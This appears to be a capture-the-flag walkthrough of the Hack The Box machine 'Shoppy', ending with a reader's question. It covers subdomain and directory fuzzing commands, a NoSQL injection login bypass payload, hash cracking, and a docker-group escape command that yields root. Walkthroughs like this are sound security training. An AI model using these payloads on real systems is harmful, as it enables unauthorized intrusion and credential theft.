Hack The Box. Walkthrough Shoppy. NoSQL injection and vulnerability in docker
![](https://habrastorage.org/getpro/habr/upload_files/159/966/b9f/159966b9fdab6262881a01fd1efb7144.png)
An investigation of nmap -sV -sC showed:
port 22: OpenSSH
port 80: ngingx 1.23.1: redirects to http://shoppy.htb
![](https://habrastorage.org/getpro/habr/upload_files/740/6d6/d3a/7406d6d3acdb2d8230bbe655d3f73dff.png)
Let’s write the ip address of the machine and shoppy.htb, for display, in /etc/hosts.
Vhost via gobuster:
While we are scanning with nmap, we use gobuster to find potential subdomains and expand penetration opportunities.
gobuster vhost -w /home/hell59/SecLists/Discovery/DNS/bitquark-subdomains-top100000.txt -t 50 -u shoppy.htb
![](https://habrastorage.org/getpro/habr/upload_files/b38/18b/5f8/b3818b5f8e8fcac00c46e2674b183195.png)
Manually explore the web application:
We examine manually the source code of the application.
![](https://habrastorage.org/getpro/habr/upload_files/141/2f3/9d5/1412f39d5a10e7f88a4244a52aa2cf88.png)
We do not find anything but a timer.
Search for files and directories:
Let’s look for directories and files, maybe we’ll find something interesting.
wfuzz -c -z file,/hell59/SecLists/Discovery/Web-Content/raft-large-directories.txt --hc 404 "http://shoppy.htb/FUZZ/"
We see that there is a /admin prefix through which we get to /login:
![](https://habrastorage.org/getpro/habr/upload_files/484/743/274/4847432740ce3cb1304472882a9041ce.png)
MongoDB NoSQL:
Looking at the authorization, we understand that this is a MongoDB NoSQL database.
![](https://habrastorage.org/getpro/habr/upload_files/481/ef6/4a9/481ef64a932fc36bff015a2f700ce9ce.png)
We can log in using the following NoSQL injection logic:
login: admin'||'1==1
password: admin
Happened!
You can read about NoSQL injections here: https://book.hacktricks.xyz/pentesting-web/nosql-injection .
![](https://habrastorage.org/getpro/habr/upload_files/fe4/846/b2e/fe4846b2e95a41ae62fe8e40ad664a3a.png)
Let’s introduce admin'||'1==1 и получим список пользователей и хэш.
![](https://habrastorage.org/getpro/habr/upload_files/e9e/901/306/e9e90130675a868bbb08cd298f7df59d.png)
Use hashcat to crack the resulting md5 hash:
Let’s use hashcat with the rockyou.txt dictionary and look at the results:
![](https://habrastorage.org/getpro/habr/upload_files/6f4/ef7/584/6f4ef7584c10a580c8675816d978f6aa.png)
Log in to the subdomain.
Now go to the subdomain mattermostafter adding it to /etc/hosts ,
http://www.mattermost.shoppy.htb with the obtained password.
![](https://habrastorage.org/getpro/habr/upload_files/577/b73/89b/577b7389b76bb078d0b55b13d1925cd5.png)
Here is the user’s chat history, and we will find important information about the machine deploy:
![](https://habrastorage.org/getpro/habr/upload_files/6f8/4b5/e83/6f84b5e832fb488153a4974272cf6a67.png)
Get the user flag:
With the received data, we log in via SSH, find the user.txt flag, and do cat user.txt.
![](https://habrastorage.org/getpro/habr/upload_files/031/4fa/b19/0314fab199847e7bf19190d97601e45e.png)
Sudo -l
![](https://habrastorage.org/getpro/habr/upload_files/854/cdd/602/854cdd602392a5deb46fbe926b6e0919.png)
If you dig around and pay attention to all the files in the password-manager, you can fish out and substitute the Sample password.
Thus, we get the username and password data:
![](https://habrastorage.org/getpro/habr/upload_files/f0b/3cf/dbe/f0b3cfdbe02145489105b0f90823c9da.png)
Log in via SSH as deploy user.
Get the root flag:
We use the docker vulnerability described here: https://gtfobins.github.io/gtfobins/docker/ .
docker run -v /:/mnt --rm -it alpine chroot /mnt sh
![](https://habrastorage.org/getpro/habr/upload_files/064/988/02f/06498802ffca5a3544e3b95b130dc977.png)
Hooray, we got root!
I don’t see the authorization header, how did you determine it was MongoDB NoSQL